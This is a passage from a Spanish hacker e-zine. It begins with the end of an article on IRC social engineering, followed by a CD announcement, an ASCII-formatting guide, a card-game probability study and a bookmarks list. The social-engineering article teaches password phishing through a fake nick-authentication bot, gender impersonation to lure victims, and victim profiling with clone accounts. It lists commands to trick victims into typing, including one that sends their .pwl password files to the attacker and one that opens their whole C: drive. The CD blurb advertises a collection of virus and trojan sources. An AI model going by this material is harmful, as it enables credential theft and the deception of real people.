  consiste el truco, a que es sencillo y hasta puede parecer estupido?? pues
  pruebalo con una victima novata y veras rapidos resultados.  A  este truco
  se le pueden aplicar mil y un usos, todo depende de tu imaginacion.
  Otro metodo muy facil de hacer es ponerse nombre de tia  ( este truco fijo
  que ya lo habreis visto ), pero no un nombre que  sugiera  que  estas  muy
  buena ;-), como leticia21, que ademas dice que eres joven ;).  Con  eso  y
  meterte en un canal de amor y decir que buscas pareja tendras a  tus  pies
  a monton de gente... Es la hora de hablar un poco contigo y  decirles  que
  si quieren tu foto en ba~ador... Que escriban la frase tal  o  reciban  el
  archio tal }x-D. Es un metodo facilote pero sus resultados son buenos.
  Otro metodo facilito es el de hacerse pasar por un bot... Es un  truco  la
  verdad bastante efectivo, y como vale mas un ejemplo que mil explicaciones
  vamos directamente al ejemplo.

  <nosotros> ************************************************
  <nosotros> Bienvenid@ al sistema de autentificacion de nick
  <nosotros> ************************************************
  <nosotros> *                                              *
  <nosotros> * Escoja una opcion                            *
  <nosotros> *                                              *
  <nosotros> * (1) Autentificar su nick                     *
  <nosotros> * (2) Desregistrar su nick                     *
  <nosotros> * (3) Ayuda                                    *
  <nosotros> *                                              *
  <nosotros> * Que opcion escoge ?                          *
  <victima> 1
  <nosotros> *                                              *
  <nosotros> * Ha escogido: 1, AUTENTIFICACION DE NICK.     *
  <nosotros> *                                              *
  <nosotros> * Nombre de usuario: victima                   *
  <nosotros> * Introduzca la contrase~a:                    *
  <victima> pw10169
  <nosotros> pw10169... Contrase~a aceptada bienvenid@ a casa ;) 

  No me direis que no es ingenioso ;), ademas si tienes prisa  es  un  truco
  que da bastantes buenos resultados en victimas novatas.

   - El metodo dificil: -

  Pues es el enga~o de toda la vida, pero mas sofisticadamente si cabe, pues
  como veremos se necesita mucha practica y una  cantidad  de  datos  de  la
  victima que nos ayudara a hacer un ataque "a medida".  Un  metodo bueno es
  el que uso yo, consiste hacer creer a  la  victima  que  aquello  que  nos
  ofrece otra persona (un clon nuestro)  es muy bueno para ve a saber tu que
  y que lo acepte... O que esa frase que nos hace escribir esa persona  hace
  maravillas y vete a saber tu que mas...  La excusa por la que le  enga~eis
  se puede cambiar...   Por si no ha quedado claro pondre un peque~o esquema
  de como se tiene que hacer:

  Fase 1 ) Recopilacion de datos de la victima.


  -> Nombre
  -> Ocupacion
  -> Aficiones
  -> Estado civil
  -> Sexo
  -> Conocimiento de la informatica.
  -> Curiosidades

  Es importante recopilar todos estos datos para hacer un esquema de lo  que
  queremos. Acto seguido hay que presentarnos ante el, en ese  caso  daremos
  nuestros datos falsos.  Una  vez tengamos claro con quien estamos hablando
  necesitaremos aprovecharnos de sus debilidades  (si busca pareja, si es un
  adicto al futbol, etc...) y transformarnos en una persona interesante para
  el, ofreciendole aquello que sabemos no puede rechazar,  ( amor,  entradas
  para ir al futbol... ) y nos iremos haciendo amigos de el  poco  a poco...
  Una vez conseguido el que su atencion  recaiga  en  nosotros,  hace  falta
  meter un clon en escena, en este caso el sera el que le enga~e...  Nuestro
  clon no hara ningun privado ni nada a la victima, y suponiendo que nuestra
  victima esta en el canal #amor y #mas_amor  un clon debe estar en un canal
  y nosotros en otro ya que el servidor de IRC detecta expone en  medio  del
  canal los clones que tenemos y no es plan  que  nuestra  victima  vea  por
  vamos. Seguimos, ya tenemos el clon en #mas_amor  donde  se  encuentra  la
  victima y nosotros en #amor, donde tambien se encuentra la  victima.  Pues
  le decimos a la victima que fulano  (nuestro clon)   tiene  una  lista  de
  personas que buscan pareja, o regala entradas para  el  futbol,  o  regala
  videos porno (joder con fulano ) o lo que sea que  le  interese,  entonces
  la victima procedera a hacerle un privado donde se encuentre nuestro  clon
  y a pedirselo... Que no cuela lo de la frase o lo del troyano ??  pues  el
  unico que habra fracasado sera nuestro clon, ya que nosotros aparentaremos
  no saber nada del tema de lo que el intentaba hacer y la  victima  seguira
  hablando con nosotros...  Y aun no la hemos  perdido,  podemos  probar con
  otro clon cambiando la tecnica, y asi las veces que haga falta...  De esta
  manera *atamos*  la victima a nosotros y la confiamos a  unos  clones  que
  si no la enga~an a la primera lo haran a la segunda,  o  a  la  tercera...
  Este metodo funciona la gran mayoria de veces  exceptuando  aquella  gente
  que no es tan inocente o que no son tan novatos.


  (--3--)- Como se consigue el enga~o ? -(---------------------------------)

  Ahora vamos a tratar la ingenieria social desde sus bases  mas  generales,
  si es que se puede decir asi, explicando en que  consiste  el  enga~o  mas
  detalladamente para que sepais en que se basan los  tipos  de  enga~os  ya
  vistos.
  El enga~o se consigue al hacer que la atencion  de  una  persona   recaiga
  sobre ti, confiando en ti,  y consiste en hacer  que  la  victima,  en  un
  exceso de confianza,  de el visto verde a todo lo que le digas porque para
  el eres alguien que sabe que no le hara nada malo.  Una vez has llegado  a
  hacer que la victima centre tu atencion en ti,  que responda a  todos  los
  privados que la haces rapidamente, que se ofrece muy simpatico  y   demas,
  es que te tiene en su lista de amigos...  Y es en ese momento donde se  le
  sugiere a la victima que haga esto o lo otro favoreciendote a ti.  Cuando
  la victima  haya  accedido  a  lo  que  tu  le  hubieras  pedido  y  hayas
  conseguido tu objetivo,  lo eticamente recomendable  para  no herir  a  la
  victima seria hacerte amigo de el/ella  diciendole que lo  que  has  hecho
  no era para fastidiarle y que no le has hecho nada malo,  y si la  victima
  no se lo toma mal pues ya tienes otro  amigo  :-).  Eso  es  ser  un  buen
  ingeniero social, eso y no otra cosa.  Se  que  algunos esto ya lo sabiais
  pero no olvideis  que  este  texto  intenta  ser  muy  ameno  y  de  facil
  comprension para todos los leen esto ( no es que vea a muchos... )

  (--4--)- Mas trucos -(---------------------------------------------------)

  Ahora que estais de verdad mentalizados de lo  que  es  ser  un  ingeniero
  social, os voy a armar con un peque~o arsenal de trucos que  nunca  vienen
  mal.  Todas estas frases tienen que  ser  introducidas  por la  victima  y
  provocan efecos secundarios.

  o.o.o.o.o.o.o.o.
    /server opme   <--- Le desconecta del IRC.
  o.o.o.o.o.o.o.o.

  o.o.o.o.o.o.o.o.o.o.o.
    /msg nickserv kill   <--- Le desregistra el nick.
  o.o.o.o.o.o.o.o.o.o.o.

  o.o.o.o.o.o.o.o.o.o.
    /join 0 helpdesk   <--- Se va de todos los canales.
  o.o.o.o.o.o.o.o.o.o.
  
  o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o
    /send c:\windows\*.*pwl tu_nick   <--- Te manda todas sus .pwl ;)
  o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o

  o.o.o.o.o.o.o.o.o.o.o.o.o
    /fserve tu_nick 5 c:\   <--- Ver "el arte de la ingenieria social".
  o.o.o.o.o.o.o.o.o.o.o.o.o

  o.o.o.o.o.o.o.o.o.o.o.o.o
   Inicio/ejecutar/con/con   (esta no se introduce desde el cliente de IRC)
  o.o.o.o.o.o.o.o.o.o.o.o.o

  (--5--)- Los consejos del abuelo -(--------------------------------------)

  Aqui van algunos consejos para que vuestra labor como ingenieros  sociales
  sea fructifera. Se podria decir como los mandamientos de  todo  ingenierio
  social precavido.
  
  Regla num.1
  " Antes de ir a cazar una victima, preguntate a ti mismo, que  es  lo  que
    deseas obtener de el, como se lo tomara, y como se  lo  debes  proponer.
    Piensalo cosa de dos minutos, relajate y comienza a hablar con el. "
  
  Regla num.2
  " Al primero que deberas saber enga~ar no es a otro que  tu  mismo,  debes
    proponerselo a la victima de tal manera que si te lo hicieran a ti tu no
    sospecharas nada. "

  Regla num.3
  " Aqui no conoceras a nadie por su nick, no te fies  de  las  apariencias,
    pues enga~an. "

  Regla num.4
  " Nadie regala nada, si quieres que la victima acceda a  lo  que  propones
    por lo menos le debes haber ofrecido algo. "

  Regla num.5
  " Cuando las cosas  se  ponen  malas,  vete,  desconectate  y  vuelvete  a
    conectar con otro nick y otros datos, y no entres  en  el  canal  de  la
    victima hasta que esta se haya ido. "

  Regla num.6
  " Debes de conocer a la victima casi tanto como a  ti  mismo,  conoce  sus
    gustos, sus debilidades y todo lo que puedas. "

  Regla num.7
  " Nunca te enfades con tu victima antes del enga~o. "
 
  Regla num.8
  " No destruyas ninguna informacion ni hagas mal uso de la que le cojas,  a
    no ser que haya fotos infanticidas, si es ese el caso, borralas. "

  Estas son las reglas basicas, pero no las unicas.

  (--6---- Despedida ------------------------------------------------------)

  Antes de irme querria aclarar dos asuntos pertinentes al anterior articulo
  que se publico en este mismo ezine: Primero que  lettera  ha  sufrido  una
  reestructuracion total de manera que no hace falta estudiarse las cookies.
  Y segunda que gracias a algunos miembros de la scene  mi  idea  de  cuando
  comenzaba el tercer milenio ha cambiado, ahora no estoy ni en un bando  ni
  en otro, no estoy seguro de la existencia del a~o cero y  prefiero  seguir
  leyendo sobre ello...
  Y como mi madre me dice que irse sin despedirse de los demas  es  de  mala
  educacion es de mala educacion, no me voy a ir de aqui  sin  saludar  a...
  Doing, a Ripe y a g.legend.

                     " Eche que entra en un bar y dise... "

                        Tahum. (tahum@demasiado.com)

*EOF*



-< 0x07 >-------------------------------------------------.--------------.--
                                                          `-[ SET Staff )-

   Es un pajaro?.... 
   Es un avion? ....
   Es un ovni?  ....

  NO!.

  Es   'Er Pako Underground'. Ole la raza.

 Un CD repleto de info underground que Er Paco <er_pako@teleline.es> puso a
 disposicion de SET alla por fines del 99/principios del 00 pero que con la
 habitual disposicion organizativa que nos caracteriza no aparecio 
 comentado en SET 22 tras lo cual Er Pako reenvio cinco, si 5, copias de la
 nueva y mejorada version

 Dejemos que el representante oficial de Pakosoft nos lo cuente..

ER_PAKO UNDER:

 -      Cursos y Tutoriales: ha sido a~adidos nuevos cursos y se han 
        quitado los obsoletos.

 -      Docs Varios: A~adidos algunos textos informaticos y algo de 
        papiroflexia

 -      Imagenes varias: alguna que otra nueva.

 -      Intros: Nada nuevo.

 -      Mini distribuciones linux: A~adida la HV Linuz 0.22.

 -      Risa: - Bastantes chistes e historias nuevas, nuevas secciones 
        de imagenes graciosas, sonidos musica y videos cachondos (genial).

 -      Canal +: nuevas versiones de los programas de descodificacion

 -      Docs. Hack: actualizacion total, cantidad de textos.

 -      E_Zines: en la seccion estrella han sido a~adidos todas la 
        publicaciones nuevas qye han aparecido, asi como los nuevos numeros 
        de las ya existentes.

 -      Numeros de serie: A~adidas nuevas versiones de los 
        programas.

 -      Paginas Webs Hackeadas: nueva seccion.

 -      Personalizacion de Windows: Nueva seccion en la que 
        encontraras facilidades y programas para darle un nuevo aire a tu 
        Windows, especial mencion a las modificacion del explorer.exe hecha 
        por mi con la que tu boton inicio pasare a llamarse ER_PAKO.

 -      Proteccion de CDs: nueva, sin comentarios.

 -      Utilidades Hack:   Totalmente actualizada.

 -      Virus: Coleccion personal de Virus compuesta por mas de 
        15.000 diferentes, codigos fuente, troyanos, creadores, informacion.. 


Ademas en plena bonanza economica, Espa~a va bien, Pakosoft lanza:
Er Pako Programas, un completo CD con todo lo necesario para que un
ordenador recien estrenado se convierta en una estacion totalmente
equipada con todos los programas que son imprescindibles para trabajar 
y/o divertirse.


Er Pako agradece a las siguientes webs el trabajo realizado y os recomienda
que no les quiteis el ojo de encima.


ZINE_STORE: Un trabajo muy currado: es de donde me he bajado muchos de 
los E_ZINES hispanos que podeis encontrar en mi CD. Surf.to/zs

La Taberna de Van Hackez: Un poco descuidada ultimamente pero muy 
buena ante todo y bien clasificada. www.vanhackez.com.

El Portal: Actualizan a diario, es muy clara y las webs asociadas por 
lo general son muy buenas. Elportal.metropoli2000.net.

DarkPort: Otro buen portal de temas Hack. Darkport.cjb.net

El agujero Negro: Buena web variada, lastima que no actualicen mas a 
menudo. Agujero.com

Y por supuesto a vosotros, los miembros de SET, la gloria del Hack 
espa~ol, y ademas originarios de MURCIA, (yo de un pueblo de la 
costa Murciana).


Er_Pako

*EOF*


-< 0x08 >-------------------------------------------------.----------------.-
                                                          `-[ RagPutana )-





    /-------------------------------------------------------------------\
    \      __                                                           /
    /     | O|                                                          \
    \     |__|                         _          _  _                  /
    /     ||    __   ___     __       (_         (   _)  ___            \
    \    (__)  (__) (_      (__) (__) (_    (__) _) (_) (_              /
    /    ======================|==============================          \
    \                          t                                        /
    /                                   ____   _____  _____ ___ ___     \
    \         ___  _      ___          #____# #____  #       #   #      /
    /          |  (_  \/   |   __      #    #      # #       #   #      \
    \          |  (_  /\   |  (__)     #    # _____# #_____ _#_ _#_     /
    /        ========================================================   \
    \___________________________________________________________________/

       -=================================================-     
         Por //RagPutana\\ para  la gente de "SET Ezine"  
    -=================================================-
                              Email:ragputana@yahoo.com


    Seguramente este articulo no tenga que ver mucho con el hacking,
    dado que no aporta gran cosa al excelente trabajo que estan haciendo
    la gente de SET . Pero si tenemos en cuenta que en el mundo UNDERGROUND
    el uso de texto en formato ASCII es lo mas habitual a la hora
    de redactar Ezines y toda clase de manuales, por que no dedicar unas
    lineas a este tema. Y es asi como me teneis aqui escribiendo sobre
    el texto en ASCII.

    Este articulo pretende ser una ayuda a la hora de escribir y formatear
    texto en ASCII, y asi conseguir que la gente que quiere dar sus
    ideas a conocer disfrute de este precioso y agradable formato con
    todas sus ventajas. (no hay ni que decir que el Ezine SET tiene
    un formato ASCII elegante, me encanta ;-)


    _____________________________________________
    Este articulo tiene los siguientes apartados:

         (A)- POR QUE USAR "ASCII"?
         (B)- COMO USARLO.
         (C)- RECURSOS "ASCII" EN LA RED.
    _____________________________________________

    Y sin mas preambulos nos centramos en el asunto, y empezamos
    por enterarnos que es eso del texto ASCII.

       (para la gente mas quisquillosa o como curiosidad
        A.S.C.I.I. es "American Standard Code for Information
        Interchange"(creo), in spanish "Codigo Standar Americano
        para Intercambio de Informacion" le podriamos llamar
        CSAII he,he!)


==========================
(A)- POR QUE USAR "ASCII"?
==========================

   Ya creo que a estas alturas estaras bastante convencido de la utilidad
   de este formato, ya que estas leyendo estas lineas escritas en
   ese formato, si no es asi sigue con la lectura a ver si logro
   convencerte.

   Nos os voy a dar 1000 razones, solo me conformo con las siguientes
   3 que me parecen que son las mas solidas, y que a mi realmente
   me convencen. Son estas las razones por las que el formateo en
   ASCII es ideal para el mundo UNDER, y las que facilitan la
   libertad de informacion:

      1.- ES UN STANDAR.

      El formato es standar, eso quiere decir que se puede leer
      desde distintas maquinas, sistemas operativos, o programas.
      Con  esto un hacker puede lograr que lo que el quiere
      decir llegue lo mas lejos posible, y que nadie tenga
      ninguna traba a la hora de leer esto. Es tan estandar
      que mi viejo MSX (un ordenata de los 80) usa el mismo
      codigo.

      Ademas hay que tener en cuenta que no salen nuevas versiones,
      como nos puede pasar con un documento escrito en WORD 97, que
      no es posible abrirlo con WORD 6.0, por lo que tenemos que
      actualizar esa birria de procesador de textos una y otra
      vez.

      2.- OCUPA POCO ESPACIO.

      La informacion que se guarda con este formato es solo
      texto, por lo que ocupa mucho menos que cualquier otro
      formato como puede ser el el WORD de Micro$oft. Ademas
      pierde un gran volumen al ser comprimido por ZIP, se
      queda en un 45 o 30%. Todo esto hace que se pueda guardar
      una gran informacion en muy poco espacio.

      Esto produce que el gasto telefonico sea lo mas peque~o
      posible a la hora de bajar informacion de la red, en 5
      minutos se pueden bajar manuales que dan mas de 5 horas
      de lectura (una ganga, por cierto yo mismo me devoro
      toda clase de manuales en mis ratos libres y es una lectura
      que no me cuesta casi nada, por no decir nada ;-)
      
      3.- SE PUEDE MODIFICAR.

      El texto producido en formato ASCII esta abierto a
      modificaciones, se puede cortar, pegar, borrar...
      asi el lector puede mejorar y aprovechar lo que se escribe.
      Asi la informacion contenida en este formato puede
      ir mutando y por supuesto ira mejorando con el tiempo.
      (como un buen vino, aunque al final caduque he,he!)

      Esto produce que los creditos puedan ser facilmente
      cambiandos, pero aun asi el hacker confia bastante en el
      lector. (Yo personalmente no conozco ninguna situacion en
      la que alguien haya cambiado los creditos)


   Como veis todas estas razones van unidas a la LIBERTAD DE INFORMACION
   que reclama la etica hacker. Supongo que si lees este Ezine estaras
   de acuerdo con todo lo aqui dicho, aun asi estoy abligado a recordar
   que simplemente es mi opinion, y que quizas tu no estes de acuerdo y
   que lo dicho por mi te parezca  una chorrada.(por que no?:-P)


=================
(B)- COMO USARLO.
=================

   A la hora de usar este formato realmente no hay ninguna regla
   escrita, por lo tanto el limite esta mas o menos en la imaginacion
   y habilidad que cada uno tenga. Tan solo tener unas cuantas
   pautas como las que nos dan desde SET:

 _________________________________________________________________________
 ________________________[pautas de SET]__________________________________
 Tratad de respetar nuestras normas de estilo. Son simples y nos facilitan
 mucho la tarea. Si los articulos los escribis pensando en estas reglas,
 nosotros podremos dedicar mucho mas tiempo a escribir mas articulos y al
 Hack ;)
 

   - 80 COLUMNAS (ni una mas, que no me pagan por maquetar lo ajeno!)

   - Usa los 127 caracteres ASCII, esto ayuda a que se vea como dios
       manda en todas las maquinas sean del tipo que sean. El hecho
       de escribirlo con el Edit de DOS no hace tu texto 100%
       compatible pero casi. Mucho cuidado con los dise~os en ascii
       que luego no se ven bien. Sobre las e~es, cuando envias un articulo
       con ellas nos demuestras que esto no lo lee nadie.
 __________________________________________________________________________


   Por si alguien no sabe cuales son los 127 caracteres de ASCII
   de que nos hablan, he recogido la siguente lista:

  _____________________________________________________________________
  __________[Regular ASCII Chart (character codes 0 - 127)]____________
  000   (nul)  016  (dle)  032 sp  048 0  064 @  080 P  096 `  112 p
  001  (soh)  017  (dc1)  033 !   049 1  065 A  081 Q  097 a  113 q
  002  (stx)  018  (dc2)  034 "   050 2  066 B  082 R  098 b  114 r
  003  (etx)  019  (dc3)  035 #   051 3  067 C  083 S  099 c  115 s
  004  (eot)  020  (dc4)  036 $   052 4  068 D  084 T  100 d  116 t
  005  (enq)  021  (nak)  037 %   053 5  069 E  085 U  101 e  117 u
  006  (ack)  022  (syn)  038 &   054 6  070 F  086 V  102 f  118 v
  007  (bel)  023  (etb)  039 '   055 7  071 G  087 W  103 g  119 w
  008  (bs)   024  (can)  040 (   056 8  072 H  088 X  104 h  120 x
  009   (tab)  025  (em)   041 )   057 9  073 I  089 Y  105 i  121 y
  010   (lf)   026   (eof)  042 *   058 :  074 J  090 Z  106 j  122 z
  011  (vt)   027  (esc)  043 +   059 ;  075 K  091 [  107 k  123 {
  012  (np)   028  (fs)   044 ,   060 <  076 L  092    108 l  124 |
  013   (cr)   029  (gs)   045 -   061 =  077 M  093 ]  109 m  125 }
  014  (so)   030  (rs)   046 .   062 >  078 N  094 ^  110 n  126 ~
  015  (si)   031  (us)   047 /   063 ?  079 O  095 _  111 o  127 
 ______________________________________________________________________


   Como veis son estos 128 los caracteres que corresponden a cada
   numero, y los que son totalmente standares casi en cualquier maquina.
   Los que funcionan siempre son los del 33 al 126. Los demas dan
   problemas.

   Si os habeis fijado no hay ni e~e, ni tildes, esto es un problema
   a la hora de escribir en castellano. Como solucion se suprimen
   las tildes y en lugar de la e~e se usa el codigo 126 ~.

   Por cierto si alguien que esta leyendo esto no sabe como escribir,
   ~, {, }, ?... o cualquier otro simbolo hay un peque~o truquillo:

    Se mantiene ALT pulsado y con la otra mano se teclea en
    el teclado numerico el codigo que corresponde al caracter,
    despues se suelta ALT y aparece el caracter.

           ALT + 126 (teclado numerico) = ~


   Otra cosa que tendriamos que hacer, seria comprobar como se ve
   el texto con diferentes editores, por lo menos habria que
   probarlos con los siguientes, ya que todos no usan el mismo
   salto de linea:

   En Windows: EDIT del dos y el Block de notas. (esto como minimo)
   Linux     : Cualquiera, pico, vi...

   Cuando hagamos la prueba con mayor cantidad de editores mas
   seguros estaremos de la compatibilidad del texto.

   Tambien es conveniente que nos fijemos como estan escritos los textos
   de los demas, es asi como se aprende la mayoria de las cosas.
   (osea que ya sabeis leer mucho SET). Al escribir o leer un articulo
   no os quedeis solo con el contenido, mirad y apreciar el formato,
   es algo que se agredece mucho.

   No estaria de mas que intentarais crear vuestro ASCII-ART.(se le
   llama asi a los dibujos creados con caracteres ASCII, como el
   titulo de este articulo, que por cierto es un poco chapucero ;-)


================================
(C)- RECURSOS "ASCII" EN LA RED.
================================

   Principalmente os recomiendo que visiteis sitios que traten
   sobre "ASCII ART". Como recomendacion en estos sitio podeis
   encontrar gran cantidad de ejemplos, asi como recopilaciones
   comprimidas en ZIP:

   The Great Ascii Art Library.
         http://www.geocities.com/SouthBeach/Marina/4942/ascii.htm

   The Ascii Art Dictionary (Andreas Freise)
         http://www.ascii-art.de

   Ascii Art en castellano:
         http://www.euskalnet.net/puravida/asciiart.html
     
   Tambien podeis ir a las NEWS, aqui podreis ver trabajos hechos
   casi por cualquiera o pedir ayuda para encontrar algo concreto.
   La verdad es que hay gente muy maja que siempre ayuda:

        NEWS: alt.ascii-art

   Si vais a consultar las news en un programa como Outlook o cualquier
   otro, teneis que escojer un tipo de letra que tenga todas las
   letras del mismo tama~o como "Courrier New", si no el ASCII ART
   no se podra apreciar.

   Tambien hay algunos editores para editar texto ASCII que nos ofrecen
   algunas facilidades como el ajuste linea automatico, a mi personalmente
   no me gustan, pero os recomendio que los probeis.

   Realmente no se si este ultimo apartado tiene mucho sentido, ya
   que es suficiente poner ASCII en cualquier buscador  y seguramente
__________________________________________   podreis encontrar graficos
_________[Ejemplo de ASCII ART]___________|  como el que veis aqui
       )            (                     |  a la izquierda. 
      /(   (\___/)  )\  _____________     |
     ( #)  \ (- -) ( # |        '\\\\\\   |  Si vuestra imaginacion no os
      ||___c\   >'__|  |        ' ____|_  |  da para ver lo que esta  
      ||**** )`_/ **'  |   +    '||:::::: |  dibujado yo os echo una mano:
.__   |'* ___| |___*'  |        '||_____| |
  \_|  |'*(    ~   ,)'  \'_______|_____|  |  " Es un diablo con su 
    )) |' /(.  '  .)\   ___/____|___\___  |    ordenata"
    (( _""";!___*_____\_|    _    '  <<<:||
      /     /|          |_________'___o_o||  Seguramente es uno de esos
    /_____/ /                             |  hackers que ha hecho algun
    |:____|/                              |  pacto con el mismo demonio.
__________________________________________|  Yo personalmente prefiero

   seguir aprendiendo en esto del hacking que dejar mi alma por ahi.
   Alla vosotros si os seduce la idea de vender vuestro alma por
   convertiros en un "superhacker". Si alguien  puede escribir
   sobre una experiencia como esta que se anime a hacer un articulo,
   que miedo! =:-{

   =======================================================================
   Supongo que todo lo expuesto aqui puede servir como ayuda para empezar
   lo demas va a vuestra cuenta y sois vosotros los que teneis que hacerlo
   =======================================================================

   Saludos a todo el mundo que se mueve por el hacking y hasta otra.
                 ___________________________________
                 (no copyright) RagPutana Mayo 2.000                      
                  _-==============================-_

  [ Editor: Parece que por fin esta empezando a calar eso de tomarse un
    poco la molestia de formatear los articulos y apreciar el ASCII ]



-< 0x09 >-------------------------------------------------.---------------.--
                                                          `-[ Hendrix )-



			Como ganar al 7 y medio
    			-----------------------

1. Introduccion

Pues aqui estoy otra vez con otro nuevo estudio matematico-estadistico-inutil
de como ganar a otro juego de azar. En este caso he analizado el juego del
7 y medio. El juego es tan conocido que el que no sepa jugar que aprenda
primero, porque no pienso rebajarme a explicar un juego tan cutre.

En el juego hay dos situaciones basicas: 
Ser la Banca  
Ser un jugador normal

Como la banca gana en caso de empate, a priori es evidente que tiene
mas posibilidades de ganar que el resto de jugadores. Por ello
siempre que podamos seremos banca.


2. Jugador normal

Cuando le toca el turno a jugador, este tiene una carta escondida y
dos opciones posibles: Pedir carta o plantarse. Es evidente que si
tienes un 1 pediras otra carta (a menos que quieras pegarte un Farol),
en cambio si tienes un 7 las posibilidades de pasarte son muy grandes.

El problema se resume en: Pido carta o me planto?

La respuesta estadistico-matematica es clara: 
Si tienes mas posibilidades de no pasarte que de pasarte, entonces
pide otra carta. Pero, que posibilidades tengo de pasarme con un "6"
si pido otra carta?. Pues contemos las cartas.


Suponiendo que hay 1 baraja con los numeros de 1 al 7 y tres figuras
(sota, caballo y rey) tenemos 40 cartas.
Por lo que el 50% lo obtenemos con 20 cartas.
Seguimos contando; hay 12 figuras, por lo tanto hay una probabilidad
de 12/40 de sacar 1/2, osea un 30%. 
De esto deducimos que hay, en principio, un 70% de posibilidades de pasarte
si tienes un "7" y pides otra carta.

Y con un "6"?, pues las combinaciones para no pasarse son dos: que
salga un 1 o que salga una figura, en total 16 combinaciones  
(4 ases y 12 figuras) osea, un 16/40 = 40% de posibilidades de no pasarte.

Tabla comparativa

Tienes un:	Combinaciones favorables	 Probabilidad de triunfar 
						  si pides otra carta 

    7	  	12 figuras(1/2) = 12/40		        30%
    6		12 + 4 ases = 16/40		        40%
    5		2, 1 o 1/2 = 20/40			50% 					
    4           3, 2, 1 o 1/2 = 24/40                   60%
    3           4, 3, 2, 1 o 1/2 = 28/40		70%
    
	etc...

En vista de esta primera tabla se deduce lo siguiente: Si tienes un 4
o menos debes pedir carta, si tienes un 6 o mas debes plantarte y
si tienes un 5 es indiferente lo que hagas.

Aunque no lo hemos mencionado, el caso de tener "6" o tener "6 y 1/2"
es identico ya que si sale un "2" nos pasamos igualmente en ambos casos.


1. Contar las cartas 

Hasta ahora hemos supuesto probabilidades sobre la baraja completa
(40 cartas) pero lo cierto es que en una partida normal hay muchas
cartas que estan sobre la mesa y si las contamos podemos variar las
probabilidades finales. Por ejemplo,

Imagina que el primer jugador se ha pasado ya que tenia un 4 y le ha
salido un 7.
Tu eres el segundo jugador y tienes un 5, sigue siendo la
probabilidad de pasarte del 50%?, No.
En este caso deberias descontar el "4" y el "7" del primer jugador
y tu propio "5", sigue habiendo 20 cartas a tu favor pero solo 17
en contra. O sea la probabilidad es de 20/37 = 54% de no pasarte.

En cambio si el primer jugador hubiera sacado 3 figuras y dos "2" sin
pasarse significa que hay 6 cartas por debajo de 3 sobre la mesa (las 5
vistas del primer jugador mas la que tiene escondida que seguro que es
menor de 3). En este caso, tus posibilidades de no pasarte son: 14/33 = 42%
Conclusion: plantate.

En general si han salido muchas figuras y pocos numeros altos es
mejor plantarse, si es al reves es mejor pedir.


2. Sacar 7 y 1/2

Por el momento no hemos contemplado la regla que dice que sacando 7 y
medio la banca paga el doble. Este hecho es muy importante ya que las
probabilidades cambian completamente. 
Concretamente la esperanza de ganar es igual a la probabilidad de
ganar por el valor del premio. (E = p * premio).
Hasta ahora estabamos suponiendo que el premio era siempre igual a
"1", pero en el caso de "7 y 1/2" el premio es igual a "2".

De este modo la esperanza de ganar teniendo 7 y pidiendo una carta es:

			12*2 / 40 = 60 % 

O sea que cuando tienes un 7 lo mejor es pedir carta, ya que el riesgo
de pasarte queda compensado con el premio doble que supone sacar 7 y
medio.

Tabla comparativa

Tienes un:	Combinaciones favorables	 Probabilidad de triunfar 
						  si pides otra carta 
 
   7		12*2/40					60%
   6.5		[4*2 + 12]/40				50%	
   6		[4 + 12]/40				40%
   5.5		[4*2 + 4 + 12 ]/40			60%
   5		[4 + 4 + 12]/40				50%
   4.5          [4*2 + 4 + 4 + 12]/40			70%	
   4 		[4 + 4 + 4 + 12]/40			60%


Explicacion: En el caso de 5.5 hay cuatro "2" en la baraja que
provocarian un 7 y 1/2 si saliesen, por lo tanto tienen un valor doble.

Los resultados son curiosos sobre todo en el caso del 5.5 ya que las
probabilidades de que merezca la pena pedir otra carta son
claramente favorables.
Nos sigue quedando los casos del 6.5 y el 5 donde la probabilidad es
del 50% y no sabemos que hacer.
En estos casos yo pediria carta ya que podriamos llegar a 5.5 o a 7 y
entonces pedir una segunda carta. Por otro lado no olvidemos contar
las cartas ya que modifican las probabilidades!!!

En resumen: Siempre pedir carta a menos que tengas un 6 o que hayan
            salido mas figuras que cartas altas


3. Cambiar las reglas

El juego del 7 y 1/2 es muy simple y seguramente cuando juegues
alguna partida llegaras a las mismas conclusiones haciendo calculos
que por intuicion o por experiencia.
Esto es debido a la Ley del Jugador Experto (inventada por mi)
que dice que: 

"Un jugador experto, inconscientemente, tiende a realizar siempre
las mejores jugadas desde el punto de vista matematico-estadistico".

O lo que es lo mismo, hacer calculos no te garantiza el ganar, tan solo
te garantiza que tus jugadas son tan buenas como las de un autentico
jugador experto en el juego.

Asumiendo esta ley, la mejor manera para ganar al jugar con jugadores
expertos es cambiar las reglas del juego. De este modo las probabilidades 
de ganar cambian y el jugador experto pierde toda su experiencia. 
En cambio el matematico puede recalcular las probabilidades y seguir 
jugando al maximo nivel.

En el caso del siete y medio hay una variante muy conocida que cambia
todas las combinaciones: El truco consiste en utilizar una baraja entera y
proponer que el "8" y el "9" valgan 1/2. En este caso el numero de cartas 
pasa a 48 y el numero de cartas que valen 1/2 pasa a 20. los resultados son:


Tienes un:	Combinaciones favorables	 Probabilidad de triunfar 
						  si pides otra carta 
 
   7		20*2/48					83%
   6.5		[4*2 + 20]/48				58%	
   6		[4 + 20]/48				50%
   5.5		[4*2 + 4 + 20]/48			66%
   5		[4 + 4 + 20]/48				58%
   4.5          [4*2 + 4 + 4 + 20]/48			75%	
   4 		[4 + 4 + 4 + 20]/48			66%


O sea, que hay que pedir carta SIEMPRE. Esto significa que la banca
acabara arruinada. Recordemos que en anterior caso la banca ganaba 
por defecto. 
(Me falta por calcular las probabidades de ganar de la banca en ambos
casos pero eso tendria que calcularlo haciendo simulaciones)


4. Despedida

Supongo a nadie le interesa lo mas minimo mis idas de pelota matematicas
con los juegos de azar (la ruleta, los chinos, el 7 y 1/2, etc..).
Pero si te interesa el tema hacker-ludopata no dudes en mandarme un mail a
hendrix66@iname.com o hendrix@lettera.net, 

Hasta otra
Hendrix 


    



-< 0x0A >-------------------------------------------------.---------------.--
                                                          `-[ SET Staff )-



                        B_ O_ O_ K_ M_ A_ R_ K_ S_



  Nuestro Bookmark de este numero tiene nuevas web que hemos considerado
  curiosas. Sois libres de enviarnos mas direcciones que considereis
  utiles o interesantes. A la direccion de siempre :

                          <set-fw@bigfoot.com>


--[  http://www.ntop.org ]

   Util programa para estar al tanto del trafico que circula por nuestra
   red, incorpora un peque~o servidor web (con algun que otro fallo de
   seguridad reportado) y puede servir de ayuda en mas de una ocasion.

--[ http://www.antioffline.com ]

